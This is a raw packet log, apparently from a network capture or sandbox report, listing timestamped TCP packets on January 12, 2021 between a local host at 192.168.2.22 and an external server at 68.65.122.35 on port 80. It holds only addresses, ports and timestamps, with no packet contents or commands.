Jan 12, 2021 01:43:53.435636997 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.435669899 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.435687065 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.435719013 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.435733080 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.435769081 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.435781956 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.435818911 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.435836077 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.435869932 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.435884953 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.435936928 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.436577082 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.436649084 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.438278913 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.628155947 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.628238916 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.628303051 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.628364086 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.628386974 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.628424883 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.628427982 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.628436089 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.628487110 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.628504992 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.628546953 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.628562927 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.628608942 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.628617048 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.628673077 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.628674984 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.628740072 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.628743887 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.628802061 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.628812075 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.628861904 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.628895044 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.628926039 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.628942013 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.628994942 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.629000902 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.629057884 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.629069090 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.629120111 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.629127979 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.629179955 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.629189968 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.629242897 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.629250050 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.629311085 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.629313946 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.629379034 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.629384041 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.629468918 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.629498959 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.629554033 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.629571915 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.629604101 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.629620075 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.629654884 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.629673004 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.629704952 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.629722118 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.629755974 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.629770994 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.629816055 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.629822969 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.629867077 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.629888058 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.629916906 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.629933119 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.629966974 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.629981995 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.630017042 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.630031109 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.630065918 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.630080938 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.630115986 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.630131960 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.630194902 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.630403996 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.630462885 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.630479097 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.630523920 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.630533934 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.630584955 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.630592108 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.630645990 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.630652905 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.630706072 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.630713940 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.630767107 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.630774021 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.630827904 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.630832911 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.630896091 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.632308006 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.823975086 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.824035883 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.824110985 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.824162006 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.824212074 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.824266911 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.824282885 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.824317932 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.824320078 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.824325085 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.824330091 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.824352980 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.824372053 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.824409008 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.824424028 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.824443102 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.824484110 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.824501991 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.824542999 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.824563980 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.824595928 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.824620962 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.824645996 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.824671984 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.824697018 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.824704885 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.824763060 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.825541973 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.825628042 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.826255083 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.826309919 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.826348066 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.826361895 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.826380968 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.826420069 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.826435089 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.826472044 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.826493025 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.826522112 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.826525927 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.826571941 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.826596022 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.826622009 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.826634884 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.826684952 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.826700926 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.826736927 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.826755047 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.826786995 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.826812029 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.826837063 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.826850891 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.826877117 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.826886892 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.826909065 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.826939106 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.826952934 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.826988935 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.827008009 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.827045918 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.827054977 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.827096939 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.827117920 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.827147007 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.827147007 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.827197075 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.827227116 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.827250957 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.827265024 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.827301979 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.827323914 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.827351093 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.827353954 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.827402115 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.827425003 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.827452898 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.827460051 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.827502966 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.827528000 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.827553988 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.827558994 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.827603102 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.827624083 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.827655077 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.827661037 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.827703953 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.827722073 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.827754974 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.827797890 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.827805042 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.827824116 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.827853918 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.827867031 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.827903986 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.827917099 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.827967882 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.833286047 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:54.082071066 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.082129002 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.082158089 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.082218885 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.082283974 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.082336903 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.082387924 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.082428932 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.082483053 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:54.082489014 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.082518101 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:54.082524061 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:54.082528114 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:54.082530975 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:54.082550049 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.082554102 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:54.082612038 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.082617998 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:54.082672119 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.082676888 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:54.082731962 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.082736969 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:54.082806110 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:54.082809925 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.082871914 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.082878113 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:54.082932949 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.082943916 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:54.082993984 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.082999945 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:54.083055973 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.083060026 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:54.083107948 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.083138943 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:54.083173037 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.083175898 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:54.083235979 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.083245993 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:54.083298922 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.083317041 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:54.083360910 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.083375931 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:54.083421946 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.083425999 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:54.083482027 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.083483934 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:54.083543062 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.083544016 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:54.083604097 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.083607912 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:54.083662987 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.083667040 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:54.083722115 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.083729982 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:54.083781958 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.083785057 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:54.083842039 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.083843946 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:54.083900928 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.083906889 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:54.083961010 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.083966017 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:54.084021091 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.084024906 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:54.084080935 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.084083080 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:54.084141016 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.084144115 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:54.084203959 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:54.086041927 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:54.276607037 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.276664972 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.276694059 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.276724100 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.276791096 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.276854038 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.276917934 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.276978970 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.277035952 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:54.277089119 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:54.277096987 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:54.277101994 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:54.277106047 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:54.277110100 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:54.277113914 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:54.277117968 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:54.278214931 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.278258085 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.278323889 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.278373957 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.278453112 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.278480053 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:54.278501987 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.278512001 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:54.278517008 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:54.278521061 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:54.278525114 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:54.278553009 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.278556108 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:54.278603077 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.278641939 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:54.278654099 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.278676987 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:54.278703928 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.278721094 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:54.278753996 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.278774977 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:54.278803110 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.278808117 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:54.278853893 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.278876066 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:54.278903008 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.278925896 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:54.278951883 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.278964996 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:54.279002905 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.279021025 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:54.279052973 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.279074907 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:54.279103994 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.279108047 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:54.279155016 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.279177904 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:54.279205084 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.279226065 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:54.279254913 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.279275894 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:54.279305935 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.279330015 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:54.279355049 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.279357910 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:54.279406071 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.279441118 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:54.279476881 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.279516935 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:54.279526949 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.279561996 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:54.279580116 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.279614925 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:54.279630899 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.279655933 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:54.279689074 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:54.469271898 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.469333887 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.469366074 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.469469070 CET	80	49165	68.65.122.35	192.168.2.22
